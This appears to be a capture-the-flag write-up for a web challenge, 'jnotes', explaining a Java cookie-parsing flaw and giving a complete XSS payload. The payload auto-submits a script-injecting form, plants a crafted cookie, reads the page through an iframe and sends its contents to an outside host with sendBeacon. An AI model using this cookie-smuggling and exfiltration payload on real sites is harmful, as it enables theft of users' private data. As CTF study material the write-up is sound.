# tl;dr

* Java mishandles the cookies such that when there is a cookie with a `"`, it will take all the cookies until there is a `"` as that cookie's value
* We can set empty cookies using javascript `document.cookie="=value";`
* Use that to set a new `note` cookie by adding `note` in the value `document.cookie='=note="';`
* Make our cookie first by giving path as `//` as chrome sends cookies with longer paths first
* Now create an iframe with `//` as src and read its innerHTML

## Final Payload

```html

<html>
<body>
<form method="POST" action="https://jnotes.mc.ax/create">
<input id="p" name="note" value="" >
</form>
<script>
document.querySelector("#p").value = `</textarea>
<\x73cript>
document.cookie='=note=";path=//';
const frame = document.createElement('iframe');
frame.src = "https://jnotes.mc.ax//";
document.body.appendChild(frame);
frame.onload = () => {
navigator.sendBeacon("https://your.domain.com",frame.contentWindow.document.body.innerHTML);
}
</\x73cript>`;
document.forms[0].submit();
</script>
</body>
</html>
```